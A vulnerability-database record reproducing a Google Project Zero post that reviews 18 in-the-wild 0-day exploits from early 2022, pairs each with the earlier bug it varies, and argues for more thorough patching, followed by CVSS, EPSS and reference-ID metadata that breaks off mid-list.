DATABASE RESOURCES PRICING ABOUT US

{"id": "GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "vendorId": null, "type": "googleprojectzero", "bulletinFamily": "info", "title": "\n2022 0-day In-the-Wild Exploitation\u2026so far\n", "description": "Posted by Maddie Stone, Google Project Zero\n\nThis blog post is an overview of a talk, \u201c 0-day In-the-Wild Exploitation in 2022\u2026so far\u201d, that I gave at the FIRST conference in June 2022. The slides are available [here](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nFor the last three years, we\u2019ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the [2021 Year in Review report](<https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html>), which we published just a few months ago in April. While we plan to stick with that annual cadence, we\u2019re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022. \n\nAs of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we\u2019ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug. \n\nProduct\n\n| \n\n2022 ITW 0-day\n\n| \n\nVariant \n \n---|---|--- \n \nWindows win32k\n\n| \n\n[CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>)\n\n| \n\n[CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) (2021 itw) \n \niOS IOMobileFrameBuffer\n\n| \n\n[CVE-2022-22587](<https://support.apple.com/en-us/HT213053>)\n\n| \n\n[CVE-2021-30983](<https://googleprojectzero.blogspot.com/2022/06/curious-case-carrier-app.html>) (2021 itw) \n \nWindows\n\n| \n\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) (\u201cFollina\u201d)\n\n| \n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (2021 itw) \n \nChromium property access interceptors\n\n| \n\n[CVE-2022-1096](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>)\n\n| \n\n[CVE-2016-5128](<https://bugs.chromium.org/p/chromium/issues/detail?id=619166>) [CVE-2021-30551](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30551.html>) (2021 itw) [CVE-2022-1232](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2280>) (Addresses incomplete CVE-2022-1096 fix) \n \nChromium v8\n\n| \n\n[CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>)\n\n| \n\n[CVE-2021-21195](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_30.html>) \n \nWebKit\n\n| \n\n[CVE-2022-22620](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>) (\u201cZombie\u201d)\n\n| \n\n[Bug was originally fixed in 2013, patch was regressed in 2016](<https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html>) \n \nGoogle Pixel\n\n| \n\n[CVE-2021-39793](<https://source.android.com/security/bulletin/pixel/2022-03-01>)*\n\n* While this CVE says 2021, the bug was patched and disclosed in 2022\n\n| \n\n[Linux same bug in a different subsystem](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cd5297b0855f17c8b4e3ef1d20c6a3656209c7b3>) \n \nAtlassian Confluence\n\n| \n\n[CVE-2022-26134](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)\n\n| \n\n[CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) \n \nWindows\n\n| \n\n[CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>) (\u201cPetitPotam\u201d)\n\n| \n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (Patch regressed) \n \nSo, what does this mean?\n\nWhen people think of 0-day exploits, they often think that these exploits are so technologically advanced that there\u2019s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we\u2019ve seen so far this year are closely related to bugs we\u2019ve seen before. Our conclusion and findings in the [2020 year-in-review report](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>) were very similar.\n\nMany of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flow that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn\u2019t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the [slides from the talk](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nWhen 0-day exploits are detected in-the-wild, it\u2019s the failure case for an attacker. It\u2019s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can\u2019t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.\n\nThis is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report: \n\nBeing able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. \n\nExactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.\n\nPractically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:\n\n * Root cause analysis\n\nUnderstanding the underlying vulnerability that is being exploited. Also tries to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix is addressing the underlying vulnerability and not just breaking the proof-of-concept. Root cause analysis is generally a pre-requisite for successful variant and patch analysis.\n\n * Variant analysis\n\nLooking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn\u2019t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply \u201cplug and play\u201d with a new vulnerability once the original is patched.\n\n * Patch analysis\n\nAnalyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor\u2019s own internal analysis.\n\n * Exploit technique analysis\n\nUnderstanding the primitive gained from the vulnerability and how it\u2019s being used. While it\u2019s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn\u2019t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.\n\nTransparently sharing these analyses helps the industry as a whole as well. We publish our analyses at [this repository](<https://googleprojectzero.github.io/0days-in-the-wild/rca.html>). We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall. \n", "published": "2022-06-30T00:00:00", "modified": "2022-06-30T00:00:00", "epss": [{"cve": "CVE-2016-5128", "epss": 0.00704, "percentile": 0.77532, "modified": "2023-06-03"}, {"cve": "CVE-2021-1732", "epss": 0.00473, "percentile": 0.72107, "modified": "2023-05-27"}, {"cve": "CVE-2021-21195", "epss": 0.00477, "percentile": 0.72242, "modified": "2023-05-27"}, {"cve": "CVE-2021-26084", "epss": 0.97488, "percentile": 0.99947, "modified": "2023-05-27"}, {"cve": "CVE-2021-30551", "epss": 0.33503, "percentile": 0.96425, "modified": "2023-05-27"}, {"cve": "CVE-2021-30983", "epss": 0.00107, "percentile": 0.42243, "modified": "2023-05-27"}, {"cve": "CVE-2021-36942", "epss": 0.83259, "percentile": 0.97907, "modified": "2023-05-23"}, {"cve": "CVE-2021-39793", "epss": 0.00067, "percentile": 0.27547, "modified": "2023-05-23"}, {"cve": "CVE-2021-40444", "epss": 0.97028, "percentile": 0.9959, "modified": "2023-05-23"}, {"cve": "CVE-2022-1096", "epss": 0.00363, "percentile": 0.68396, "modified": "2023-06-17"}, {"cve": "CVE-2022-1232", "epss": 0.00119, "percentile": 0.44931, "modified": "2023-06-17"}, {"cve": "CVE-2022-1364", "epss": 0.00693, "percentile": 0.77376, "modified": "2023-06-17"}, {"cve": "CVE-2022-21882", "epss": 0.02866, "percentile": 0.89286, "modified": "2023-06-14"}, {"cve": "CVE-2022-22587", "epss": 0.00182, "percentile": 0.54209, "modified": "2023-06-14"}, {"cve": "CVE-2022-22620", "epss": 0.00183, "percentile": 0.54343, "modified": "2023-06-14"}, {"cve": "CVE-2022-26134", "epss": 0.97537, "percentile": 0.99987, "modified": "2023-08-11"}, {"cve": "CVE-2022-26925", "epss": 0.97177, "percentile": 0.99683, "modified": "2023-06-03"}, {"cve": "CVE-2022-30190", "epss": 0.97252, "percentile": 0.99752, "modified": "2023-08-11"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html", "reporter": "GoogleProjectZero", "references": [], "cvelist": ["CVE-2016-5128", "CVE-2021-1732", "CVE-2021-21195", "CVE-2021-26084", "CVE-2021-30551", "CVE-2021-30983", "CVE-2021-36942", "CVE-2021-39793", "CVE-2021-40444", "CVE-2022-1096", "CVE-2022-1232", "CVE-2022-1364", "CVE-2022-21882", "CVE-2022-22587", "CVE-2022-22620", "CVE-2022-26134", "CVE-2022-26925", "CVE-2022-30190"], "immutableFields": [], "lastseen": "2023-08-12T02:03:44", "viewCount": 318, "enchantments": {"score": {"value": 8.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "AKAMAIBLOG:6B355C8FD4C2D8E5A670002BC4BD9497", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "almalinux", "idList": ["ALSA-2022:1777"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-21195", "ALPINE:CVE-2021-30551", "ALPINE:CVE-2022-1096", "ALPINE:CVE-2022-1364", "ALPINE:CVE-2022-22620"]}, {"type": "apple", "idList": ["APPLE:02740BCB30C345C4CD19795FBD8FD739", "APPLE:16752A28F5EAA2C135C9F24F2AA98541", "APPLE:4A4048A18F34C672CBA0BD1BE526B92E", "APPLE:52E627AE8868F50352A397AD32DB5373", "APPLE:5678B20D3DFDE1186274020F3596D327", "APPLE:99DB3A974D6753D61A4B9F20ACDACD13", "APPLE:99E4CCCCE2782591968B06F1CD58BA2D", "APPLE:EF619761E522E15BAB653ACD81383CBF"]}, {"type": "archlinux", "idList": ["ASA-201607-12", "ASA-202106-31", "ASA-202106-32", "ASA-202106-45", "ASA-202107-2"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844", "CONFSERVER-79000", "CONFSERVER-79016"]}, {"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "AKB:1196BAF9-A467-480D-A40C-F3E93D5888D6", "AKB:12497ECD-6565-46DB-AD65-2F25827C7711", "AKB:12E53A37-65EB-4DDE-B8B5-4725EB276697", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:31AEBF63-78A2-4DBE-A691-982C63A64DD0", "AKB:6D883363-6A9C-411A-8D48-5872842B65D3", "AKB:732A3017-A62C-4347-9709-9B8790F47FA1", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "AKB:C3852904-E628-40EE-9AD4-445FC1899CF7", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:CC573E3E-6D5A-41AC-B91C-D1B70E18674F", "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0", "AKB:F7DBB7CA-A582-4BC6-87C3-ACA4DBC4F58B", "AKB:FF8776A0-8F09-4620-A059-9AA63732C37D"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:3530747E605445686B7211B2B0853579", "AVLEONOV:37BE727F2D0C216B8B10BD6CBE6BD061", "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:4B6EFA5DE55BAEFCD9C72826A3524969", "AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:8FE7F4C2B563A2A88EB2DA8822A13824", "AVLEONOV:D630CE92574B03FCC2E79DCA5007AAFC", "AVLEONOV:E820C062BC9959711E1D1152D8848072", "AVLEONOV:FDBB133A2C9231CE02F5A15C4AC02F24", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "cert", "idList": ["VU:405600"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0032", "CPAI-2021-0484", "CPAI-2021-0487", "CPAI-2021-0548", "CPAI-2021-0554", "CPAI-2022-0007", "CPAI-2022-0283", "CPAI-2022-0297", "CPAI-2022-0325"]}, {"type": "chrome", "idList": ["GCSA-1145367273444230144", "GCSA-2955998722942640296", "GCSA-3441285346354809272", "GCSA-3812047510544759764", "GCSA-459312130044903550", "GCSA-6244807684233791030", "GCSA-6591445864469691028"]}, {"type": "cisa", "idList": ["CISA:1AD0E0C2A1CB165DDD5F6A0F4C21101D", "CISA:63CCB4AC4FF75E87DC5BBA1121FC4501", "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "CISA:7135D71F3A4288760C8E71D4E553A3B4", "CISA:71FB648030101FA9B007125DFA636193", "CISA:911DE59572B6EF78B42DD868D622F637", "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "CISA:B55BB602515A4C4A2D3C252B1A8C9767", "CISA:C70D91615E3DC8B589B493118D474566", "CISA:D7188D434879621A3A83E708590EAE42", "CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4", "CISA:F30D0D7B72453DC3FC64D2AC1AA31F33", "CISA:F68E3446BD3C1E21B1B472DF044A0CC3", "CISA:F9916EF5EF9E126FF62CF4162B96669F"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-1732", "CISA-KEV-CVE-2021-26084", "CISA-KEV-CVE-2021-30551", "CISA-KEV-CVE-2021-30983", "CISA-KEV-CVE-2021-36942", "CISA-KEV-CVE-2021-39793", "CISA-KEV-CVE-2021-40444", "CISA-KEV-CVE-2022-1096", "CISA-KEV-CVE-2022-1364", "CISA-KEV-CVE-2022-21882", "CISA-KEV-CVE-2022-22587", "CISA-KEV-CVE-2022-22620", "CISA-KEV-CVE-2022-26134", "CISA-KEV-CVE-2022-26925", "CISA-KEV-CVE-2022-30190"]}, {"type": "cnvd", "idList": ["CNVD-2021-69088", "CNVD-2022-22949"]}, {"type": "cve", "idList": ["CVE-2016-5128", "CVE-2021-1698", "CVE-2021-1732", "CVE-2021-21195", "CVE-2021-26084", "CVE-2021-30551", "CVE-2021-30983", "CVE-2021-36942", "CVE-2021-39793", "CVE-2021-40444", "CVE-2022-1096", "CVE-2022-1232", "CVE-2022-1364", "CVE-2022-21882", "CVE-2022-21887", "CVE-2022-22587", "CVE-2022-22620", "CVE-2022-26134", "CVE-2022-26925", "CVE-2022-30190"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3637-1:68841", "DEBIAN:DSA-3637-1:92B2C", "DEBIAN:DSA-4886-1:0EF07", "DEBIAN:DSA-4886-1:8DF2D", "DEBIAN:DSA-5083-1:1231B", "DEBIAN:DSA-5084-1:8E2FE", "DEBIAN:DSA-5110-1:CD232", "DEBIAN:DSA-5114-1:7546B", "DEBIAN:DSA-5121-1:3B3A1"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-5128", "DEBIANCVE:CVE-2021-21195", "DEBIANCVE:CVE-2021-30551", "DEBIANCVE:CVE-2022-1096", "DEBIANCVE:CVE-2022-1232", "DEBIANCVE:CVE-2022-1364", "DEBIANCVE:CVE-2022-22620"]}, {"type": "exploitdb", "idList": ["EDB-ID:50243", "EDB-ID:50952"]}, {"type": "fedora", "idList": ["FEDORA:0BF68306D452", "FEDORA:10E2D309BE14", "FEDORA:25D31307CC0A", "FEDORA:2A81C3067778", "FEDORA:6987B3049380", "FEDORA:7264F30C2A76", "FEDORA:75CA430AA7A6", "FEDORA:993DD30E4796", "FEDORA:B033C30C3DD2", "FEDORA:B4C4A30D8539", "FEDORA:D63AA304E89C", "FEDORA:E6CD0309D335"]}, {"type": "freebsd", "idList": ["20B3AB21-C9DF-11EB-8558-3065EC8FD3EC", "323F900D-AC6D-11EC-A0B8-3065EC8FD3EC", "6FAE9FE1-5048-11E6-8AA7-3065EC8FD3EC", "A25EA27B-BCED-11EC-87B5-3065EC8FD3EC", "BDDADAA4-9227-11EB-99C5-E09467587C17", "FE15F30A-B4C9-11EC-94A3-3065EC8FD3EC"]}, {"type": "gentoo", "idList": ["GLSA-201610-09", "GLSA-202104-08", "GLSA-202107-06", "GLSA-202208-25", "GLSA-202208-39"]}, {"type": "github", "idList": ["GITHUB:003DCB978A30670D9AF7272F3BCCE4A8", "GITHUB:0519EA92487B44F364A1B35C85049455", "GITHUB:36A8218D126985012FDC093E052DADD1", "GITHUB:B36CF6D99B79B071507638EAF3F7EF40", "GITHUB:D9472F716C46C02F88677DBAD0EEA334"]}, {"type": "githubexploit", "idList": ["005DDBE6-0F17-58D7-9DC2-4D1F01F2A8FD", "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "02241D2D-F86F-5FE5-95FD-6978A07FE7FA", "02C6FE13-5036-5BE5-8AC8-278A918BA581", "02FCE52D-5E91-5C57-A40A-DE4FF7C726A3", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "0990FE6E-7DC3-559E-9B84-E739872B988C", "0AD00567-1561-5CE2-8DA5-E64B286CBCAC", "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "0E388E09-F00E-58B6-BEFE-026913357CE0", "0E5BE237-A243-54B8-9AD7-92FBA10D1FA2", "0E951B86-8BC4-54D9-BE2B-7B5DD988D1A0", "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "111C9F44-593D-5E56-8040-615B48ED3E24", "12691014-3333-5741-80A4-3357BD72D2AC", "1840A140-1CD9-55F2-A8BD-9B7B27779956", "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "1C45657B-E388-5668-9093-F3934858B728", "1CC55581-1C7F-5DA8-A34C-FA125B3D510A", "1D0AAF42-5E68-5985-A800-90937D55628D", "1E1DD2F1-F609-5686-A0EF-1C08ACABF537", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "1F907E1E-A975-55B6-BAFC-80A32B2DDAE7", "1F9C946C-1533-5835-B5E8-641EF4FFC145", "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "221070D3-0B31-5CF7-A508-B4740B63647B", "228C8A28-3BE8-51C1-A7B0-993047B4EC76", "237105AA-3579-5C91-BC0F-55BF93EC18DD", "2444574D-533F-593F-8E0E-68EA2B47EF55", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "24DE1902-4427-5442-BF63-7657293966E2", "252F889F-2BFB-5D8D-B1CD-63075FB7EC34", "25DCDCD3-A32C-5B44-B706-FFF9535ECFC2", "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "28E888C4-78E3-5F8D-B316-AB42FED892F9", "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "2D9FF49E-AD93-5397-80B0-B02DED73DEA6", "305ADB34-3669-5AAD-8D51-FCFFEF9E3F47", "30F42F9A-5E27-592E-BE65-B85DC7E22075", "321617C5-08C5-5919-9510-2571831D052E", "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "37F78533-E96A-5433-B558-90DB82C0BB27", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "39D1AD81-7117-5EA3-8421-A33979B77F49", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3CCF78E3-E22A-54A3-907C-1D687E20BE7C", "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "423DF4D5-60AF-5663-B196-2A67DD13D226", "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "45B4D881-57D9-51C8-B5B9-9A6DA7413A36", "464D6B41-AE5F-5E93-BD26-6E6C8E9F80BC", "46787A11-B7F1-54E3-A965-2AEFCD29DB29", "469B060E-C585-599E-A0D1-AD5D186F70FD", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "4881AA63-B127-594A-8F5B-ED68FD4BB9FF", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "506F4ED7-477B-50E3-9250-1C6A31D8C357", "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "53CC55D8-983C-5FA9-AE81-D20750A6612E", "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "55D44407-F5C9-50A9-B51D-0D4F668CD993", "56417A88-33CB-520F-8FC3-4F3E49561DDC", "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "594C33E1-9EBF-5B3B-BA76-031ACB500518", "5B74BEF9-0D39-5A60-8806-ABA55730878C", "5C66B0C2-B7C3-5BF1-AE5C-846940E188A6", "5CB77852-699B-52CD-AF0E-AFD2DE82A2B2", "5DC52EE8-31C1-5E05-8AC1-8385C2002254", "5E516DC2-BF71-57D0-9A87-3874146D0F83", "5E983FEF-4BE8-5A69-BABE-3CFFC983F1B5", "633FDFCF-0DF4-5FE6-B5DF-85F847D6D31E", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "66468422-89C0-5AC8-9CEA-6B512338FF7C", "66A7ADCB-1EAD-519B-9B1F-5694A2860BA1", "675E960A-9F2E-5575-8C21-8528492BE5C6", "69FAE88E-7F22-5ACC-B555-3441BE00C566", "6AF23F99-AE40-5899-AD81-AE3F71760F38", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "6BC80C90-569E-5084-8C0E-891F12F1805E", "6E70CDA8-57F7-5737-80B5-84D8D2254D9D", "70407390-C149-54F1-89B0-7611FB420601", "705BFDF7-98C8-5300-AB18-E9EEE465AE5F", "71065DAD-91FD-5CFB-9F35-CA3E1837FF2C", "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "7333A285-768C-5AD9-B64E-0EC75F075597", "74AB19DC-78DE-56B8-8EB3-DBFA48B17AD5", "75389328-1B05-5056-B8C0-C624BF0343AD", "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "7BE60530-0495-5366-846A-73B1A778DBDA", "7C531491-7EB6-51AA-9072-F345BDB61AFD", "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "7F49BA75-ECD5-5933-8F39-585255092893", "7FAB36AD-345E-5C1B-B259-20BF0E7DE97A", "81008F39-5622-5A06-95F5-737A63D240D0", "83B145E2-F995-5B1C-863E-164839ED1173", "84D5F04A-0DDB-5788-8759-DA99D303B756", "8516D742-8A1C-521C-8372-26BA9FBA2200", "85BF1C0C-52A1-5413-8D04-253B6AC0B7CA", "87746757-7ADF-518B-8EA1-A11AC7E420FC", "88EFCA30-5DED-59FB-A476-A92F53D1497E", "8AB79327-A57A-5D2D-830F-F7DAA97B76AA", "8B907536-B213-590D-81B9-32CF4A55322E", "8CD90173-6341-5FAD-942A-A9617561026A", "8F6AEAF4-2161-55F7-96CB-003251BDC309", "8FDF5020-8C7F-5695-ADD0-58100BD21FFF", "91A5BC48-2410-555B-B7FB-8138577D6B78", "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "9C08AAB4-D76D-550C-ADA2-175E9AC92E38", "9CB70E27-04CC-50BC-9F3E-2907ABA654EA", "A4440EF1-5891-5FCD-BA92-DD2B6E54C7F0", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A78746B7-318B-5981-A2EB-2D5BA5C26514", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "B16D26DB-D60C-5C0C-9452-80112720B442", "B2474BAA-4133-5059-8F0B-5BAAE9664466", "B3146F3C-4919-564B-8B1E-752FCA30B8D9", "B47171B0-339A-582E-8AAC-3B18373664B7", "B49D93D1-E77A-5CAA-8DAC-BC353782D5A7", "B6182C52-78F5-58BC-8D3F-EF87D0239F0E", "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "B8347185-A0AD-5C98-B2DB-599D8BE5EF53", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "B9C2639D-9C07-5F11-B663-C144F457A9F7", "BAA0F684-952E-5B9E-B207-0419A33AC53B", "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "BC3F41CB-4333-5CCE-85A9-7064DAA6019A", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "CA13A26D-7A19-511A-B059-BE9AEDA1F2E2", "CC614155-FD7D-599B-B89C-006B26D76F48", "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE477D7E-7586-5C82-8DCC-033C48461E66", "CEC4033D-26C5-5A07-8D86-31A7AF928BDB", "CFDC15EB-BE4F-5C86-B8B0-C542A791F67D", "D22CFFB0-30A6-5227-8048-C9C028070BD3", "D424D6C6-13F7-5CAE-8771-9103296520B9", "D70A4D0B-027B-57A1-B882-C70D16FCA9C3", "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "DD36D028-7FB1-5824-9756-09BA3927DCEE", 